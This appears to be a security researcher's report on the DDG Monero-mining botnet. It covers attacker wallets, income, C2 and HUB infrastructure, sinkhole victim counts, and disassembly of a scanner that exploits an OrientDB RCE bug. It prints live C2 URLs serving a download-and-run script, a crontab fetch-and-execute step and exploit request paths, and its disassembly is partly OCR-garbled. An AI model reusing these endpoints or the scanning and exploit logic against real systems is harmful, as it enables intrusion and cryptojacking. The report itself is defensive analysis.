DDG: A Mining Botnet Aiming at Database Servers

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Starting 2017-10-25, we noticed there was a large scale ongoing scan targeting the OrientDB databases. Further analysis found that this is a long-running botnet whose main goal is to mine Monero CryptoCurrency. We name it **DDG.Mining.Botnet** after its core function module name DDG.

Currently we are able to confirm that the botnet has mined more than **3,395 Monroe coins**, equivalent to **USD 925,383** at current prices. In addition, there is another 2,428 XMRs (equivalent to USD 661,759) we have yet to fully confirm due to the mining pool's payment record issue. This makes DDG by far the second largest Monroe related botnet we have seen, just behind the <u>MyKings</u> <u>Botnet</u> we reported earlier.

DDG code appears at least late in 2016 and is continuously updated throughout 2017.

DDG uses a C2 and HUB layout to communicate with its clients. The HUB is a set of IPs and domain names that are used to provide Miner program for the compromised clients to download.

It is worth noting that we were able to successfully register and sinkhole two domain names used by its v2011 version, thus we were able to have a good understanding of the size of the entire DDG botnet based on Sinkhole data.

DDG Mining Botnet Total Incoming

DDG uses the following mine pool:

https://monero.crypto-pool.fr/

Three wallet addresses have been used, as follows:

- Wallet #1
- 4AxgKJtp8TTN9Ab9JLnvg7BxZ7Hnw4hxigg35LrDVXbKdUxmcsXPEKU3SEUQxeSFV3bo2zCD7AiCzP2kQ6VHouK3KwnTKYg
 Wallet #2

45XyPEnJ6c2STDwe8GXYqZTccoHmscoNSDiTisvzzekwDSXyahCUmh19Mh2ewv1XDk3xPj3mN2CoDRjd3vLi1hrz6imWBR1 • Wallet #3

44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM

Among them, Wallet#3 was the first wallet address been used, most active between the time period 2017-02~2017-03; then followed by Wallet#1, been used most of the 2017; Wallet#2 is a recent active one first seen on 2018-01-03.

The pool allows us to check the payment record of the wallets. The income of all three wallets is shown in the following table. The total income is Monroe 3,395 or 5,760. These tokens are worth USD 925,383 or 1,569,963 today. Note: There is an issue for the second wallet, where "Total Paid" is not consistent with the summary of all tractions' amount. We cannot confirm which number is more accurate, so we show both numbers here.

	Total Paid	USD	CNY	Transaction Amount Summary (red unbalanced)	USD	CNY
Wallet #1	2,418	659,075	4,146,296			
Wallet #2	63	17,178	108,070	2,428	661,759	4,163,179
Wallet #3	914	249,129	1,567,291			
Sum	3,395	925,383	5,821,657	5,760	1,569,963	9,876,766

DDG Mining Botnet Workflow

By analyzing the sample and its behavior, we can characterize the DDG Mining Botnet attack as follows:



In the picture above, DDG Mining Botnet attack process can be divided into several stages:

- Initial Scanning: The attacker (ss2480.2) exploits the known RCE vulnerability of the OrientDB database and drops the attack payload
- Stage 1: Attackers modify local Crontab scheduled tasks, download and execute i.sh (hxxp: //218.248.40.228:8443/i.sh) on the primary server and keep it synchronized every 5 minutes
- Stage 2: DDG traverses the built-in file hub_iplist.txt, check the connectivity of every single entry and try to download the corresponding Miner program wnTKYg from the one can be successfully connected (wnTKYg.noaes if the native CPU does not support AES-NI)
- Mining Stage: The Miner program begins to use the computing resources of the compromised host to begin mining for the attacker's wallet.

The **HUB** used in the second phase is a very interesting design. The attacker goes over all IPs and domain names written in the HUB file to download the mining program, so as to avoid the possible blocking caused by using a single download server. We observe that DDG operators update the IP and domain names of these HUB from time to time, and most of these ips and domains are hacked boxes. See the entire HUB list at the end.

In v2011, somehow two domain names out of three on the list were left unregistered, so we went ahead and registered them, as follows.

- defaultnotepad567[.]com
- unains1748[.]com unregistered
- 5dba35bsmrd[.]com unregistered

Below we will introduce the DDG botnet C2s, HUB, and Bot respectively.

The C2s

The DDG botnet uses the following C2 to maintain control of the device:

- 202.181.169.98:8443/i.sh
- 218.248.40.228:8443/i.sh

The first C2 was only used by this botnet briefly. And the second C2 has been pretty much the only active C2 for the last two years.

The HUB and Our Sinkhole

DDG botnet uses **HUB_IP: 8443\wnTKYg** to provide miner program. The detailed list of the two versions of HUB we monitored is given in the loC section at the end of this article. The country distribution is shown in the following table. Most of the victims can be seen in China.

V2	011	V2020		
count	country	count	country	
China	100	China	114	
United States	18	United States	22	
Korea	6	Japan	12	
Vietnam	5	Singapore	11	
Singapore	5	Korea	11	
Japan	5	Thailand	3	
France	3	India	3	
Sweden	2	France	3	
India	2	Netherlands	2	
Germany	2	Germany	2	
Canada	2	Canada	2	
Russia	1	Vietnam	1	
Portugal	1	Turkey	1	
Norway	1	Ireland	1	
Latvia	1	Iran	1	
Israel	1			
Iran	1			
Indonesia	1			
Cyprus	1			
total	158	total	189	

As we mentioned before, DDG bot will go over and check connectivity of every single one of the IPs and domain names on the hub list, which means we were able to get a very accurate infected clients list by sinkhole the above two domains.

The DDG operators noticed this after about 20 days and subsequently released an updated version of DDG code that replaced all IPs and domain names, including our Sinkholed domains. But the time is long enough for us to have some good measurement of this botnet.

Use Sinkhole Data to Measure DDG Mining Botnets

From the sinkhole data, we recorded a total of 4,391 IP addresses of victims from all countries, with the most prominent victims being China (73%) and the United States (11%):



geoip.number.raw: Descending	geoip.asn.raw: Descending	Unique count of ip.raw
AS37963	Hangzhou Alibaba Advertising Co.,Ltd.	595
AS4134	Chinanet	450
AS4837	CNCGROUP China169 Backbone	360
AS45090	Shenzhen Tencent Computer Systems Company Limited	222
AS23724	IDC, China Telecommunications Corporation	96
AS14618	Amazon.com, Inc.	70
AS4808	CNCGROUP IP network China169 Beijing Province Network	66
AS7922	Comcast Cable Communications, Inc.	62
AS9808	Guangdong Mobile Communication Co.Ltd.	35
AS36813	Hamilton County Communications, Inc	33
AS4847	China Networks Inter-Exchange	31
AS4812	China Telecom (Group)	30
AS16509	Amazon.com, Inc.	26
AS36351	SoftLayer Technologies Inc.	25
AS45102	Alibaba (China) Technology Co., Ltd.	22
AS52308	DEL COLORADO SAPEM	21
AS23650	AS Number for CHINANET jiangsu province backbone	20
AS56041	China Mobile communications corporation	20
AS24138	China Tietong Telecommunication Corporation	17
AS25178	Keycom PLC	15
AS4538	China Education and Research Network Center	14
AS38895	Amazon.com Tech Telecom	14
AS34977	PROCONO S.A.	14
AS58543	Guangdong	12
AS11067	Panhandle Telecommunications Systems, INC.	12
AS59019	Beijing Kingsoft Cloud Internet Technology Co., Ltd	12
AS55246	EASTERN OREGON TELECOM	11
AS6327	Shaw Communications Inc.	10
AS17621	China Unicom Shanghai network	10
AS38365	Beijing Baidu Netcom Science and Technology Co., Ltd.	9
AS9318	Hanaro Telecom Inc.	9
AS11979	Bluegrass Network LLC	9
AS12025	IO Capital Princess, LLC	9
AS38283	CHINANET SiChuan Telecom Internet Data Center	9
AS20115	Charter Communications	9

And the following diagram shows the overall trend of the victim's DNS requests for the above two domains.



To avoid abuse, the list of all victims IP is not made public.

A DNSMon Perspective

Our DNSMon is also aware of these three domain names, the traffic access patterns of these 3 domains match very well as can be seen from the first diagram:



And the second diagram show that these 3 domains have very strong correlations.

20171017	1.000000	4	5dba35bsmrd.com
20171017	1.000000	4	unains1748.com
20171017	1.000000	4	defaultnotepad567.com
20171021	1.000000	45	defaultnotepad567.com
20171021	0.911111	41	unains1748.com
20171021	0.911111	41	ngmc.mopon.cn
20171021	0.844444	38	api.loongcinema.com
20171021	0.822222	37	5dba35bsmrd.com
20171021	0.533333	24	cm-x.xt800.com
20171021	0.088889	4	data.yoloho.com
20171021	0.066667	3	www.viptop.cn
20171021	0.066667	3	www.zgdygf.com
20171021	0.066667	3	www.sarft.gov.cn
20171022	1.000000	42	defaultnotepad567.com
20171022	0.928571	39	5dba35bsmrd.com
20171022	0.928571	39	ngmc.mopon.cn
20171022	0.857143	36	unains1748.com
20171022	0.857143	36	api.loongcinema.com
20171022	0.642857	27	cm-x.xt800.com
20171022	0.119048	5	university.cfg-barco.com
20171022	0.095238	4	www.cfg-barco.com
20171022	0.047619	2	www.zyxmmovie.com
20171022	0.047619	2	update.jskp.jss.com.cn
20171023	1.000000	39	defaultnotepad567.com
20171023	0.923077	36	unains1748.com
20171023	0.871795	34	5dba35bsmrd.com
20171023	0.769231	30	ngmc.mopon.cn
20171023	0.743590	29	api.loongcinema.com
20171023	0.487179	19	cm-x.xt800.com
20171023	0.102564	4	send.gudongqun.com
20171023	0.051282	2	as.lieying.cn
20171023	0.051282	2	xavatar.imedao.com
20171023	0.051282	2	xqimg.imedao.com

DDG Mining Botnet Attack Process Breakdown

Initial Scanning

The scanning and intrusion phase of DDG Mining Botnet is done by sample ss2480.2. The ss2408.2 scans port 2480 and then uses the OrientDB RCE Vulnerability <u>CVE-2017-11467</u> to implement the intrusion.

ss2480.2 will first scan the internal network, and then scan the public network segment. The internal target IP ranges are:

- 10.Y.x.x/16 (Y is the value of the current intranet IP B segment)
- 172.16.x.x/16
- 192.168.x.x/16

.text:0821DEF0	loc_821DEF0:			CODE	XREF:	ddg_target.	_New_func1+785 † j
.text:0821DEF0		cmp	dl, 192				
.text:0821DEF3		jnz	<pre>short loc_821DF0B</pre>				
.text:0821DEF5		cmp	eax, 1				
.text:0821DEF8		jbe	loc_821E1A4				
.text:0821DEFE		movzx	ebx, byte ptr [ec:	x+1]			
.text:0821DF02		cmp	bl, 168				
.text:0821DF05		jz	loc_821DC7B				
.text:0821DF0B							
.text:0821DF0B	loc_821DF0B:			CODE	XREF:	ddg_target.	_New_func1+A03†j
.text:0821DF0B		cmp	dl, 172				
.text:0821DF0E		jnz	<pre>short loc_821DF29</pre>				
.text:0821DF10		стр	eax, 1				
.text:0821DF13		jbe	loc_821E19D				
.text:0821DF19		movzx	edx, byte ptr [ec:	x+1]			
.text:0821DF1D		add	edx, 0FFFFFFF0h				
.text:0821DF20		cmp	dl, 15				
.text:0821DF23		jbe	loc_821DC7B				

After the internal networks scan, ss2480.2 visits hxxp://v4.ident.me to get a public IP address of the current host WAN_IP, then using **WAN_IP/8** to generate public Target IP ranges. All the reserved address segments will be filtered:

.text:0821D6A0		lea	eax, [esp+304h+var_1E0]
.text:0821D6A7		mov	[esp+304h+var_304], eax
.text:0821D6AA		mo∨	[esp+304h+var_300], 254
.text:0821D6B2		call	math_randRand_Intn
.text:0821D6B7		mov	eax, [esp+304h+var_2FC]
.text:0821D6BB		lea	edx, [eax+1]
.text:0821D6BE		movzx	eax, [esp+304h+var_2E1]
.text:0821D6C3		mov	ecx, [esp+304h+map_obj]
.text:0821D6CA			
.text:0821D6CA	loc_821D6CA:		; CODE XREF: ddg_target_New_func1+528↓j
.text:0821D6CA		стр	edx, 10
.text:0821D6CD]7	<u>short_loc_821D6A0</u>
.text:0821D6CF		стр	edx, 127
.text:0821D6D2		jz	short loc_821D6A0
.text:0821D6D4		mov	[esp+304h+var_2B8], edx
.text:0821D6D8		стр	edx, 172
.text:0821D6DE		jnz	loc_821DAC4
.text:0821D6E4		mov	ebx, 16
.text:0821D6E9		jmp	short loc_821D716
.text:0821D6EB			
.text:0821D6FB			
.text:0821D6FB	loc_821D6EB:		: CODE XREF: dda taraet New func1+22Cli
.text:0821D6FB		lea	eax, [esp+304h+var 1E0]
.text:0821D6F2		mov	Fesp+304h+var = 3041, eax
.text:0821D6F5		mov	[esp+304h+var 300], 256
.text:0821D6FD		call	math rand Rand Intn
text:0821D702		mov	ehx, $Fesn+304h+var$ 2FC1
+ex+.0821D702		movzy	$e_{0}x$, [esp-304h-war 2F1]
+ov+•0821D700		mov2A	ecx [esp+304h+man obj]
+0.00210700		mov	adx [asp-304h) ap 282]
+ov++0821D716		iiio v	
.text:0821D716	loc 821D716	ino v	· CODE YPEE: dda target New func1:1EQti
.text:0821D716 .text:0821D716	loc_821D716:	log	; CODE XREF: ddg_target_New_func1+1F9fj
.text:0821D716 .text:0821D716 .text:0821D716 .text:0821D716	loc_821D716:	lea	<pre>cux, [esp+304mivar_255] ; CODE XREF: ddg_target_New_func1+1F9fj ebp, [ebx-10h] abn 15]</pre>
.text:0821D716 .text:0821D716 .text:0821D716 .text:0821D716 .text:0821D719	loc_821D716:	lea cmp	<pre>cux, [esp+304Hivar_255] ; CODE XREF: ddg_target_New_func1+1F9fj ebp, [ebx-10h] ebp, 15 short loc 821D6ER</pre>
.text:0821D716 .text:0821D716 .text:0821D716 .text:0821D716 .text:0821D719 .text:0821D710	loc_821D716:	lea cmp jbe	<pre>; CODE XREF: ddg_target_New_func1+1F9fj ebp, [ebx-10h] ebp, 15 short loc_821D6EB</pre>
.text:0821D716 .text:0821D716 .text:0821D716 .text:0821D716 .text:0821D719 .text:08224F86 text:08224F86	loc_821D716:	lea cmp jbe esp, 60	<pre>; CODE XREF: ddg_target_New_func1+1F9fj ebp, [ebx-10h] ebp, 15 short loc_821D6EB h h h h h h h h h h h h h h h h h h h</pre>
<pre>.text:0821D716 .text:0821D716 .text:0821D716 .text:0821D716 .text:0821D719 .text:08224F86 .text:08224F89 .text:08224F91</pre>	loc_821D716: sub mov mov	lea cmp jbe esp,60 [esp+60 [esp+60	; CODE XREF: ddg_target_New_func1+1F9fj ebp, [ebx-10h] ebp, 15 short loc_821D6EB h htarg_4], 0 htarg 8], 0
<pre>.text:0821D716 .text:0821D716 .text:0821D716 .text:0821D716 .text:0821D719 .text:08224F86 .text:08224F89 .text:08224F91 .text:08224F91</pre>	loc_821D716: sub mov mov mov	lea <u>Cmp</u> jbe esp, 60 [esp+60 [esp+60 eax, [e	<pre>; CODE XREF: ddg_target_New_func1+1F9fj ebp, [ebx-10h] ebp, 15 short loc_821D6EB bh bh+arg_4], 0 bh+arg_8], 0 esp+60h+arg_0]</pre>
<pre>.text:0821D716 .text:0821D716 .text:0821D716 .text:0821D716 .text:0821D719 .text:08224F86 .text:08224F89 .text:08224F91 .text:08224F91 .text:08224F91</pre>	loc_821D716: sub mov mov mov mov	lea cmp jbe esp, 60 [esp+60 eax, [e [esp+60	<pre>; CODE XREF: ddg_target_New_func1+1F9fj ebp, [ebx-10h] ebp, 15 short loc_821D6EB bh bh+arg_4], 0 bh+arg_8], 0 esp+60h+arg_0] bh+var_60], eax</pre>
<pre>.text:0821D716 .text:0821D716 .text:0821D716 .text:0821D716 .text:0821D719 .text:08224F86 .text:08224F89 .text:08224F91 .text:08224F91 .text:08224F90 .text:08224F00 .text:08224F00</pre>	loc_821D716: mov mov mov mov mov call	lea cmp jbe esp,60 [esp+60 eax,[e [esp+60 main	<pre>; CODE XREF: ddg_target_New_func1+1F9fj ebp, [ebx-10h] ebp, 15 short loc_821D6EB bh bh+arg_4], 0 bh+arg_8], 0 esp+60h+arg_0] bh+var_60], eax xploit_ListDatabases ; /listDatabases</pre>
<pre>.text:0821D716 .text:0821D716 .text:0821D716 .text:0821D716 .text:0821D719 .text:08224F86 .text:08224F89 .text:08224F91 .text:08224F91 .text:08224F90 .text:08224FA0 .text:08224FA0</pre>	loc_821D716: sub mov mov mov mov call mov mov	lea cmp jbe esp,60 [esp+60 eax,[e [esp+60 main_f eax,[e	<pre>; CODE XREF: ddg_target_New_func1+1F9fj ebp, [ebx-10h] ebp, 15 short loc_821D6EB bh bh+arg_4], 0 bh+arg_8], 0 esp+60h+arg_0] bh+var_60], eax ixploit_ListDatabases ; /listDatabases esp+60h+var_58]</pre>
<pre>.text:0821D716 .text:0821D716 .text:0821D716 .text:0821D716 .text:0821D719 .text:08224F86 .text:08224F89 .text:08224F91 .text:08224F91 .text:08224F90 .text:08224FA0 .text:08224FA0 .text:08224FA9 .text:08224FA9 .text:08224FA0</pre>	loc_821D716: sub mov mov mov mov call mov mov mov test	lea cmp jbe esp,60 [esp+60 eax,[e eax,[e ecx,[e ecx,[e	<pre>; CODE XREF: ddg_target_New_func1+1F9[†]j ebp, [ebx-10h] ebp, 15 short loc_821D6EB h h h+arg_4], 0 h+arg_8], 0 esp+60h+arg_0] h+var_60], eax xxploit_ListDatabases ; /listDatabases esp+60h+var_58] esp+60h+var_5C] x</pre>
<pre>.text:0821D716 .text:0821D716 .text:0821D716 .text:0821D716 .text:0821D717 .text:08224F80 .text:08224F89 .text:08224F91 .text:08224F90 .text:08224FA0 .text:08224FA0 .text:08224FA0 .text:08224FAD .text:08224FAD</pre>	loc_821D716: sub mov mov mov mov call mov mov test jnz	lea cmp jbe esp,60 [esp+60 [esp+60 eax,[e eax,[e ecx,[e ecx,[e ecx,ec loc_822	<pre>; CODE XREF: ddg_target_New_func1+1F9fj ebp, [ebx-10h] ebp, 15 short loc_821D6EB bh bh+arg_4], 0 bh+arg_8], 0 esp+60h+arg_0] bh+var_60], eax ixploit_ListDatabases ; /listDatabases esp+60h+var_58] esp+60h+var_50] ix</pre>
<pre>.text:0821D716 .text:0821D716 .text:0821D716 .text:0821D716 .text:0821D717 .text:08224F80 .text:08224F81 .text:08224F91 .text:08224F90 .text:08224FA0 .text:08224FA0 .text:08224FA0 .text:08224FAD .text:08224FAD .text:08224FAD .text:08224FAD</pre>	loc_821D716: sub mov mov mov mov call mov mov test jnz mov	lea cmp jbe esp+60 [esp+60 eax, [e eax, [e eax, [e ecx, [e ecx, ec loc_822 eax, [e	<pre>; CODE XREF: ddg_target_New_func1+1F9fj ebp, [ebx-10h] ebp, 15 short loc_821D6EB hh h+arg_4], 0 h+arg_8], 0 esp+60h+arg_0] bh+var_60], eax isploit_ListDatabases ; /listDatabases esp+60h+var_58] esp+60h+var_50]</pre>
<pre>.text:0821D716 .text:0821D716 .text:0821D716 .text:0821D716 .text:0821D719 .text:08224F80 .text:08224F89 .text:08224F91 .text:08224F91 .text:08224F90 .text:08224FA0 .text:08224FA0 .text:08224FA0 .text:08224FAD .text:08224FAD .text:08224FAD .text:08224FB5 .text:08224FB9</pre>	loc_821D716: mov mov mov call mov mov test jnz mov mov	lea cmp jbe esp+60 [esp+60 eax, [e eax, [e eax, [e ecx, [e ecx, ec loc_822 eax, [e	<pre>; CODE XREF: ddg_target_New_func1+1F9fj ebp, [ebx-10h] ebp, 15 short loc_821D6EB hh h+arg_4], 0 h+arg_8], 0 esp+60h+arg_0] h+var_60], eax xxploit_ListDatabases ; /listDatabases esp+60h+var_58] esp+60h+var_50] xx 2533D esp+60h+arg_0] h+var_60], eax</pre>
<pre>.text:0821D716 .text:0821D716 .text:0821D716 .text:0821D716 .text:0821D719 .text:08224F80 .text:08224F89 .text:08224F91 .text:08224F91 .text:08224F90 .text:08224F90 .text:08224FA0 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FB5 .text:08224FB5 .text:08224FB5 .text:08224FB5</pre>	loc_821D716: mov mov mov call mov test jnz mov mov mov	lea cmp jbe esp+60 [esp+60 [esp+60 eax, [e eax, [e ecx, [e ecx, [e ecx, [e ecx, [e ecx, [e [esp+60] [esp+60 [esp+60] [esp+60 [esp+60] [<pre>; CODE XREF: ddg_target_New_func1+1F9fj ebp, [ebx-10h] ebp, 15 short loc_821D6EB h h+arg_4], 0 h+arg_8], 0 esp+60h+arg_0] h+var_60], eax xxploit_ListDatabases ; /listDatabases esp+60h+var_58] esp+60h+var_50] xx tsp esp+60h+arg_0] h+var_60], eax h+var_50], 0</pre>
<pre>.text:0821D716 .text:0821D716 .text:0821D716 .text:0821D716 .text:0821D719 .text:08224F80 .text:08224F89 .text:08224F91 .text:08224F91 .text:08224F90 .text:08224F90 .text:08224FA0 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FB5 .text:08224FB5 .text:08224FB6 .text:08224FG4</pre>	loc_821D716: sub mov mov mov call mov mov test jnz mov mov mov call	lea cmp jbe esp+60 [esp+60 eas, [e eas, [e eax, [e ecx, [e	<pre>; CODE XREF: ddg_target_New_func1+1F9[†]j ebp, [ebx-10h] ebp, 15 short loc_821D6EB h h+arg_4], 0 h+arg_4], 0 h+arg_8], 0 ssp+60h+arg_0] h+var_60], eax ixploit_ListDatabases ; /listDatabases ssp+60h+var_58] esp+60h+var_5C] ix isps both var_60], eax h+var_60], eax h+var_60], eax h+var_5C], 0 ixploit_doPriv ; check pri: . (command/%s(sal/-/202format_rid_type_vorgion_class_engeb)</pre>
<pre>.text:0821D716 .text:0821D716 .text:0821D716 .text:0821D716 .text:0821D717 .text:08224F86 .text:08224F89 .text:08224F91 .text:08224F91 .text:08224F91 .text:08224F90 .text:08224FA0 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FB5 .text:08224FB5 .text:08224FB5 .text:08224FC4 .text:08224FC4</pre>	loc_821D716: sub mov mov mov call mov mov test jnz mov mov mov call mov	lea cmp jbe esp+60 [esp+60 eas, [e eax, [e] eax, [e eax, [e	<pre>; CODE XREF: ddg_target_New_func1+1F9fj ebp, [ebx-10h] ebp, 15 short loc_821D6EB h h+arg_4], 0 h+arg_4], 0 h+arg_6], eax isp+60h+arg_0] h+var_60], eax isploit_ListDatabases ; /listDatabases isp+60h+var_58] esp+60h+arg_0] h+var_60], eax h+var_60], eax h+var_5C], 0 isploit_doPriv ; check pri: ; /command/%s/sql/-/20?format=rid,type,version,class,graph isp+60h+arg_0]</pre>
<pre>.text:0821D716 .text:0821D716 .text:0821D716 .text:0821D716 .text:0821D719 .text:08224F80 .text:08224F89 .text:08224F91 .text:08224F91 .text:08224F90 .text:08224FA0 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FB5 .text:08224FB5 .text:08224FC4 .text:08224FC4 .text:08224FC9 .text:08224FC9</pre>	loc_821D716: sub mov mov mov call mov mov test jnz mov mov mov call mov mov mov mov	lea cmp jbe esp+60 [esp+60 eas, [e eax, [e eax, [e eax, [e eax, [e eax, [e [esp+60] [esp+60 [esp+60] [esp+60] [esp+60	<pre>cux, [espisornival_coog] ; CODE XREF: ddg_target_New_func1+1F9fj ebp, [ebx-10h] ebp, 15 short loc_821D6EB h h h+arg_4], 0 h+arg_4], 0 h+arg_0] h+var_60], eax ixploit_ListDatabases ; /listDatabases isp+60h+arg_0] h+var_50], eax isps h+var_50], eax h+var_50], 0 ixploit_doPriv ; check pri: ; /command/%s/sql/-/20?format=rid,type,version,class,graph isp+60h+arg_0] h+var_58], eax </pre>
<pre>.text:0821D716 .text:0821D716 .text:0821D716 .text:0821D716 .text:0821D719 .text:08224F80 .text:08224F89 .text:08224F91 .text:08224F91 .text:08224F90 .text:08224FA0 .text:08224FA0 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FB5 .text:08224FB5 .text:08224FC4 .text:08224FC4 .text:08224FC9 .text:08224FC0 .text:08224FD1</pre>	loc_821D716: sub mov mov mov call mov mov test jnz mov mov mov call mov mov mov mov mov mov mov mov	lea cmp jbe esp+60 [esp+60 [esp+60 eax, [e eax, [e eax, [e ecx, [e ecx, [e [esp+60] [esp+60] [esp+60	<pre>cux, [espisornival_coog] ; CODE XREF: ddg_target_New_func1+1F9fj ebp, [ebx-10h] ebp, 15 short loc_821D6EB h h h+arg_4], 0 h+arg_4], 0 h+arg_0] h+var_60], eax ixploit_ListDatabases ; /listDatabases isp+60h+arg_0] h+var_50], eax h+var_50], eax h+var_50], 0 ixploit_doPriv ; check pri: ; /command/%s/sql/-/20?format=rid,type,version,class,graph isp+60h+arg_0] h+var_54], 1</pre>
<pre>.text:0821D716 .text:0821D716 .text:0821D716 .text:0821D716 .text:0821D719 .text:08224F80 .text:08224F89 .text:08224F91 .text:08224F91 .text:08224F90 .text:08224F90 .text:08224FA0 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FB5 .text:08224FB5 .text:08224FB5 .text:08224FC4 .text:08224FC9 .text:08224FC9 .text:08224FD1 .text:08224FD1</pre>	loc_821D716: sub mov mov mov call mov mov test jnz mov mov mov mov mov mov mov mov	lea cmp jbe esp,60 [esp+60 eas,[e eax,[e eax,[e eax,[e ecx,[e ecx,[e [esp+60] [esp+60 [esp+60 [esp+60] [esp+60] [esp	<pre>cux, [espisornival_coog] ; CODE XREF: ddg_target_New_func1+1F9fj ebp, [ebx-10h] ebp, 15 short loc_821D6EB h h h+arg_4], 0 h+arg_4], 0 h+arg_0] h+var_60], eax ixploit_ListDatabases ; /listDatabases isp+60h+arg_0] h+var_50], eax h+var_50], 0 ixploit_doPriv ; check pri: ; /command/%s/sql/-/20?format=rid,type,version,class,graph isp+60h+arg_0] h+var_50], 8 h h h h h h h h h h h h h h h h h h h</pre>
<pre>.text:0821D716 .text:0821D716 .text:0821D716 .text:0821D716 .text:0821D719 .text:08224F80 .text:08224F89 .text:08224F91 .text:08224F91 .text:08224F90 .text:08224F90 .text:08224FA0 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FB5 .text:08224FB5 .text:08224FC4 .text:08224FC9 .text:08224FC9 .text:08224FD1 .text:08224FD1 .text:08224FD0 .text:08224FD0 .text:08224FD0 .text:08224FD0 .text:08224FD0 .text:08224FD0 .text:08224FD0</pre>	loc_821D716: sub mov mov mov call mov mov test jnz mov mov mov mov mov mov mov mov	lea cmp jbe esp,60 [esp+60 [esp+60 eax,[e eax,[e eax,[e ecx,[e ecx,[e [esp+60] [esp+60] [es	<pre>cux, [espisornival_coog] ; CODE XREF: ddg_target_New_func1+1F9fj ebp, [ebx-10h] ebp, 15 short loc_821D6EB h h h+arg_4], 0 h+arg_4], 0 h+arg_0] h+var_60], eax ixploit_ListDatabases ; /listDatabases isp+60h+arg_0] h+var_50], eax h+var_50], 0 ixploit_doPriv ; check pri: ; /command/%s/sql/-/20?format=rid,type,version,class,graph isp+60h+arg_0] h+var_51, 0 ixploit_doPriv_ptr h+var_54], 1 h+var_60], 8 iinExploit_doPriv_ptr </pre>
<pre>.text:0821D716 .text:0821D716 .text:0821D716 .text:0821D716 .text:0821D719 .text:08224F86 .text:08224F89 .text:08224F91 .text:08224F91 .text:08224F90 .text:08224F90 .text:08224FA0 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FB5 .text:08224FB5 .text:08224FC4 .text:08224FC9 .text:08224FC9 .text:08224FC0 .text:08224FD1 .text:08224FE0 .text:08224FE0 .text:08224FE0 .text:08224FE0</pre>	loc_821D716: sub mov mov mov call mov mov test jnz mov mov mov mov mov mov mov mov	lea cmp jbe esp,60 [esp+60 [esp+60 eax,[e eax,[e eax,[e ecx,[e ecx,[e ecx,[e [esp+60] [esp+60 [esp+60] [esp+60] [esp	<pre>cux, [espisornival_coop] ; CODE XREF: ddg_target_New_func1+1F9†j ebp, [ebx-10h] ebp, 15 short loc_821D6EB h h+arg_4], 0 h+arg_4], 0 h+arg_0] h+var_60], eax ixploit_ListDatabases ; /listDatabases isp+60h+arg_0] h+var_50], eax ixploit_doPriv; check pri: ; /command/%s/sql/-/20?format=rid,type,version,class,graph isp+60h+arg_0] h+var_51, 0 ixploit_doPriv_ptr h+var_52, ecx </pre>
<pre>.text:0821D716 .text:0821D716 .text:0821D716 .text:0821D716 .text:0821D717 .text:0821D710 .text:08224F89 .text:08224F89 .text:08224F91 .text:08224F91 .text:08224F90 .text:08224FA0 .text:08224FA0 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FB5 .text:08224FB5 .text:08224FC4 .text:08224FC9 .text:08224FC9 .text:08224FC9 .text:08224FD1 .text:08224FD1 .text:08224FE0 .text:08224FE0 .text:08224FE0 .text:08224FE0 .text:08224FE0</pre>	loc_821D716: sub mov mov mov call mov mov test jnz mov mov mov call mov mov mov mov call mov mov mov call mov mov call mov mov call mov mov call mov mov call mov mov call mov mov call mov mov call mov mov call mov mov call mov mov call mov mov call mov mov call mov call mov call mov call mov call mov mov call mov call mov mov call mov mov call mov mov call mov mov call mov mov call mov mov call mov mov call mov mov call mov mov call mov mov call mov mov call mov mov call mov mov call mov mov call mov mov call mov mov mov call mov mov mov mov mov mov mov mov	lea cmp jbe esp,60 [esp+60 [esp+60 eax, [e eax, [e eax, [e ecx, [e ecx, ec loc_822 eax, [e [esp+60] [esp+60 [esp+60] [esp+60] [esp+60	<pre>cux, [esp; bounnet _cool] ; CODE XREF: ddg_target_New_func1+1F9fj ebp, [ebx-10h] ebp, 15 short loc_821D6EB h bh+arg_4], 0 h+arg_8], 0 ssp+60h+arg_0] h+var_60], eax ixploit_ListDatabases ; /listDatabases ssp+60h+var_56] ixx ixsissp=60h+arg_0] h+var_60], eax h+var_50], 0 ixploit_doPriv; check pri: ; /command/%s/sql/-/20?format=rid,type,version,class,graph ssp+60h+arg_0] h+var_58], eax h+var_54], 1 h+var_56], ecx e_deferproc</pre>
<pre>.text:0821D716 .text:0821D716 .text:0821D716 .text:0821D716 .text:0821D717 .text:08224F80 .text:08224F89 .text:08224F91 .text:08224F91 .text:08224F90 .text:08224F90 .text:08224FA0 .text:08224FA0 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FA5 .text:08224FB5 .text:08224FB5 .text:08224FC4 .text:08224FC4 .text:08224FC9 .text:08224FC9 .text:08224FC0 .text:08224FC0 .text:08224FC0 .text:08224FE0 .text:08224FE0 .text:08224FE0 .text:08224FE0 .text:08224FE0 .text:08224FE0 .text:08224FE0 .text:08224FE0 .text:08224FE0 .text:08224FE0 .text:08224FE0 .text:08224FE0 .text:08224FE0 .text:08224FE0 .text:08224FE0 .text:08224FE0 .text:08224FE0</pre>	loc_821D716: sub mov mov mov mov call mov mov test jnz mov mov mov mov mov mov mov mov	lea cmp jbe esp,60 [esp+60 eas,[e eax,[e eax,[e eax,[e eax,[e eax,[e eax,[e [esp+60] [esp+60 [esp+60] [esp+60] [esp+	<pre>cux, [esp:bornitur_cooj ; CODE XREF: ddg_target_New_func1+1F9†j ebp, [ebx-10h] ebp, 15] short loc_821D6EB wh wh+arg_8], 0 ssp=60h+arg_0] wh+vor_60], eax ixploit_ListDatabases ; /listDatabases ssp=60h+vor_58] esp=60h+vor_56], 0 ixploit_doPriv 